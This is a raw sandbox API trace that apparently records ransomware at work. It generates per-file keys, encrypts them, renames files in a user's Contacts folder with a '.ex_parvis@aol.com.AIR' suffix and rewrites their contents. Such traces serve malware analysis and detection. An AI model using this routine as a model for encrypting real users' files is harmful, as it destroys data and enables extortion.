	[0099.575] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.575] WriteFile (in: hFile=0x37c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.576] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.576] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.576] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x494) returned 0x5fb388
	[0099.576] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x494) returned 0x3a20048
	[0099.576] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.576] ReadFile (in: hFile=0x37c, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x494, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x494, lpOverlapped=0x0) returned 1
	[0099.576] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1172, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.576] WriteFile (in: hFile=0x37c, lpBuffer=0x3a20048*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesWritten=0x3a1f778*=0x494, lpOverlapped=0x0) returned 1
	[0099.577] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb388 | out: hHeap=0x540000) returned 1
	[0099.577] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20048 | out: hHeap=0x540000) returned 1
	[0099.577] CloseHandle (hObject=0x37c) returned 1
	[0099.577] GetProcessHeap () returned 0x540000
	[0099.577] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.577] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.577] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.577] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589228 | out: hHeap=0x540000) returned 1
	[0099.578] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5892b0 | out: hHeap=0x540000) returned 1
	[0099.578] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0099.578] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.578] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.578] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.578] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.578] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", dwFileAttributes=0x80) returned 1
	[0099.579] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 61
	[0099.579] GetProcessHeap () returned 0x540000
	[0099.579] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x598b60
	[0099.579] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact"
	[0099.579] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.579] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.581] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0099.581] GetProcessHeap () returned 0x540000
	[0099.581] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.581] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1174) returned 1
	[0099.581] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x496
	[0099.581] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.581] GetProcessHeap () returned 0x540000
	[0099.581] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.581] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.581] WriteFile (in: hFile=0x37c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.584] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.584] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.584] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x496) returned 0x5fb388
	[0099.584] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x496) returned 0x3a20048
	[0099.584] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.584] ReadFile (in: hFile=0x37c, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x496, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x496, lpOverlapped=0x0) returned 1
	[0099.584] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.584] WriteFile (in: hFile=0x37c, lpBuffer=0x3a20048*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesWritten=0x3a1f778*=0x496, lpOverlapped=0x0) returned 1
	[0099.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb388 | out: hHeap=0x540000) returned 1
	[0099.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20048 | out: hHeap=0x540000) returned 1
	[0099.585] CloseHandle (hObject=0x37c) returned 1
	[0099.585] GetProcessHeap () returned 0x540000
	[0099.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5892b0 | out: hHeap=0x540000) returned 1
	[0099.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589338 | out: hHeap=0x540000) returned 1
	[0099.585] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70) returned 0x5db0d8
	[0099.585] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.585] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.585] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.586] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.586] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0099.586] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 51
	[0099.586] GetProcessHeap () returned 0x540000
	[0099.586] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xcc) returned 0x59d258
	[0099.586] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini"
	[0099.586] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.586] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.588] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0099.588] GetProcessHeap () returned 0x540000
	[0099.588] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.588] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=412) returned 1
	[0099.588] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x19c
	[0099.588] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.588] GetProcessHeap () returned 0x540000
	[0099.588] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.588] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.589] WriteFile (in: hFile=0x37c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.589] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.590] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.590] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x19c) returned 0x56efb8
	[0099.590] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x19c) returned 0x5781b0
	[0099.590] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.590] ReadFile (in: hFile=0x37c, lpBuffer=0x56efb8, nNumberOfBytesToRead=0x19c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56efb8*, lpNumberOfBytesRead=0x3a1f778*=0x19c, lpOverlapped=0x0) returned 1
	[0099.590] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-412, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.590] WriteFile (in: hFile=0x37c, lpBuffer=0x5781b0*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5781b0*, lpNumberOfBytesWritten=0x3a1f778*=0x19c, lpOverlapped=0x0) returned 1
	[0099.590] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56efb8 | out: hHeap=0x540000) returned 1
	[0099.590] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5781b0 | out: hHeap=0x540000) returned 1
	[0099.590] CloseHandle (hObject=0x37c) returned 1
	[0099.591] GetProcessHeap () returned 0x540000
	[0099.591] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.591] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.591] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.591] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0099.591] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x591a38 | out: hHeap=0x540000) returned 1
	[0099.591] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0099.591] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.591] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.591] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.591] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.591] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", dwFileAttributes=0x80) returned 1
	[0099.592] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 60
	[0099.592] GetProcessHeap () returned 0x540000
	[0099.592] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x598b60
	[0099.592] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact"
	[0099.592] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.592] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.594] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0099.595] GetProcessHeap () returned 0x540000
	[0099.595] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.595] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1177) returned 1
	[0099.595] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x499
	[0099.595] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.595] GetProcessHeap () returned 0x540000
	[0099.595] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.595] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.595] WriteFile (in: hFile=0x37c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.596] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.596] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.597] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x499) returned 0x5fb388
	[0099.597] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x499) returned 0x3a20048
	[0099.597] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.597] ReadFile (in: hFile=0x37c, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x499, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x499, lpOverlapped=0x0) returned 1
	[0099.597] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1177, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.597] WriteFile (in: hFile=0x37c, lpBuffer=0x3a20048*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesWritten=0x3a1f778*=0x499, lpOverlapped=0x0) returned 1
	[0099.597] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb388 | out: hHeap=0x540000) returned 1
	[0099.597] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20048 | out: hHeap=0x540000) returned 1
	[0099.597] CloseHandle (hObject=0x37c) returned 1
	[0099.597] GetProcessHeap () returned 0x540000
	[0099.598] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.598] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.598] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.598] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589338 | out: hHeap=0x540000) returned 1
	[0099.598] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5893c0 | out: hHeap=0x540000) returned 1
	[0099.598] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0099.598] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.598] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.598] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.598] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.598] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", dwFileAttributes=0x80) returned 1
	[0099.598] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 61
	[0099.598] GetProcessHeap () returned 0x540000
	[0099.598] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x598b60
	[0099.598] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact"
	[0099.598] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.598] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.607] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0099.607] GetProcessHeap () returned 0x540000
	[0099.607] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.607] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1171) returned 1
	[0099.607] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x493
	[0099.607] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.607] GetProcessHeap () returned 0x540000
	[0099.607] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.607] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
